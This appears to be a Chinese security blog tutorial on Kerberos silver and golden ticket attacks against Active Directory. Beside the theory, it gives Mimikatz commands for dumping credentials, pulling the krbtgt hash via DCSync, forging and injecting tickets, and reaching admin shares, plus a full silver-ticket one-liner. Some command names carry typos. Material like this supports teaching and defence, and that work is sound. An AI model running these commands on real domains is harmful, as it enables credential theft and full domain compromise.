您现在的位置是:首页 > 正文

「Active Directory Sec」白银票据和黄金票据

2024-02-01 05:01:44阅读 2

描述

白银票据: 即伪造的TGS。当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器。此过程不需要KDC的参与。但缺点是只能访问一个服务。

黄金票据: 即伪造TGT。当攻击者拥有普通域账户,krbtgt ntlm hash ,域SID时,就可以伪造TGT。拥有黄金票据就拥有了域内所有的访问控制权限。

原理

黄金票据

在这里插入图片描述
通过Kerberos的通信过程就可以看出,当攻击者获取krbtgt的HASH值时,就可以利用这个HASH去伪造TGT,票据授予票据,在以后每一次的通信过程中,Client就能利用这个伪造的TGT去获取要访问的Server的TGS。也就是说,伪造了黄金票据,就拥有了域内所有的访问控制权限。

黄金票据的条件

  1. 域名称
  2. 域的SID值
  3. 域的krbtgt账户NTLM HASH
  4. 伪造用户名

局限

在一个多域AD森林中,如果创建的黄金票据不包含在Enterprise Admin组中,则黄金票据不会向森林中的其他域提供管理权限。在单个域中,由于Enterprise Admin组驻留在此域中,这时黄金票据不存在局限性。

Mimikatz伪造黄金票据、

1.获取winodws域名称

$ systeminfo

2.获取krbtgt和账户信息

mimikatz# sekurlsa::kerberos
mimikatz# sekurlsa::ticket /export
mimikatz# sekurlsa::logonpassword
mimikatz# lsadump::dsync /domain:xxx.xxx.xxx /user:krbtgt
mimikatz# lsadump::lsa /patch -> sid+ntlm

3.生成黄金票据

#  使用krbtgt的hash值:
mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi

# 使用krbtgt的aes256值:
mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi

在这里插入图片描述
4.使用黄金票据

#  导入票据
mimikatz::ptt test.kribi

#检验缓存票据
PS C:\Users\Administrastor> klist  

#利用票据访问
PS C:\Users\Administrastor> net use \\xx.domain-name
dir \\xx.domain-name\c$

在这里插入图片描述
在这里插入图片描述
利用dcsync获取hash
从域控制器获取user01的hash

在这里插入图片描述

白银票据

在这里插入图片描述
从kerberos通信协议来看,在KDC向Client发送TGS时,利用了远程服务器Server和KDC共享的长期秘钥来加密的。也就是说,只要获取了远程服务器Server的NTLM HASH就可以伪造票据。前提是利用其他方式获取需要访问服务器的NTLM HASH。

特点

  1. 不需要与KDC进行交互
  2. 需要目标服务的NTLM HASH

Mimikatz 白银票据伪造:

  • kerberos::list #列出票据
  • kerberos::purge # 清除票据
    在这里插入图片描述

白银票据的伪造:

mimikatz “kerberos::golden /user:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit

在这里插入图片描述

总结

在kerberos认证中,KDC是Client和Server的共同信任第三方,而建立信任的过程中“票据”是信任关系的凭据。但这张凭据的最终生成核心秘钥还是NTLM HASH,获取NTLM HASH之后,就可以伪造票据,达到欺骗的效果。也可以认为是域内的权限提升。

网站文章

  • Day3.数据可视化-- 可视化基础

    Day3.数据可视化-- 可视化基础

    可视化主要是以图像来展示数据间的关系,常见的图形种类有折线图,散点图,条形图,直方图,饼图。此外在接下来课程中还会用到箱线图,热力图,蜘蛛图,表示二元变量分布和成对关系的视图。学好可视化...

    2024-02-01 05:01:37
  • C++ 内存分区: 代码区 全局区 栈区 堆区

    C++ 内存分区: 代码区 全局区 栈区 堆区

    1.代码区: 存放函数体的二进制代码,由操作系统进行管理 **2.全局区:**存放全局变量和静态变量以及常量,数据在程序结束后由操作系统释放 存放内容:全局变量、静态变量、常量区(字符串常量和其他常量) **3.栈区:**由编译器分配和释放,存放函数的参数值,局部变量等 **4.堆区:**由程序员分配和释放,若程序员不释放,程序结束时由操作系统回收 ...

    2024-02-01 05:01:10
  • Android中 Bitmap Drawable Paint的获取、转换以及使用

    比如Drawable中有一系列连续的图片,img_0.png, img_1.png, img_2.png ... 如果要动态获取这些图片,通过"R.drawable.img_x"的...

    2024-02-01 05:01:03
  • 【靶场平台】一些免费好用的靶机渗透测试环境

    1、Vulhub: (各种漏洞环境集合,一键搭建漏洞测试靶场) https://vulhub.org/(在线版) https://github.com/vulhub/vulhub(离线版) 2、Vul...

    2024-02-01 05:00:55
  • Servlet的自动加载

    Servlet的自动加载

    本文阐述了Servlet中与自动加载相关的知识点,并展示了怎样通过设置loadOnStartup属性将自定义Servlet设定为自动加载。

    2024-02-01 05:00:27
  • STM32单片机-CorTexM3位带操作的理解

    STM32单片机-CorTexM3位带操作的理解

    STM32单片机-CorTexM3位带操作的理解

    2024-02-01 05:00:21
  • 测试人员要掌握的基本的SQL语句

    测试人员要掌握的基本的SQL语句

    目录  一、DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE)  二、DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT)  三、DCL—数据控制语言(GRANT,REVOKE) 四、下半部分内容(主要是PL/<span class="t_tag" onclick="function onclick(){tagshow(event)}"

    2024-02-01 05:00:15
  • vue关于@无法找到文件报错

    vue关于@无法找到文件报错

    如果在Vite项目中使用@无法找到文件,通常是因为未正确配置路径别名(path alias)导致的。在Vite中,您可以使用vite.config.js文件来配置路径别名。请确保将路径别名配置为与您的项目结构和实际路径相匹配。在上述示例中,我们使用alias选项来配置路径别名。通过@别名,我们将./src目录与@关联起来。//配置less @ 跨域。

    2024-02-01 05:00:10
  • Springboot之Thymeleaf 表单标签(表单提交)|第二章-yellowcong 热门推荐

    Springboot之Thymeleaf 表单标签(表单提交)|第二章-yellowcong 热门推荐

    通过post方式提交表单的时候,需要有一个实体类,去接收表单传递的数据类容,在对象的属性读取中,Thymeleaf 提供了两种方式:1、直接通过${userInfo.username} ,这种实体bean + 属性的方式;2、通过选择表达式*{username}的这种方式。 在表单提交的表单中,表单对象需要在界面跳转进来的时候,传递一个表单对象过来,不然就会报错,不知道这个表单对象是什么鬼。 代码

    2024-02-01 04:59:38
  • Docker swarm部署控制

    Docker swarm部署控制

    还记得我之前写过一片文章叫做《Docker快速部署项目,极速搭建分布式》,在那里讲述了如何去使用docker swarm,如何构建自己的私人镜像仓库。随着最近的业务量的增长,机子加多。对于docker...

    2024-02-01 04:59:32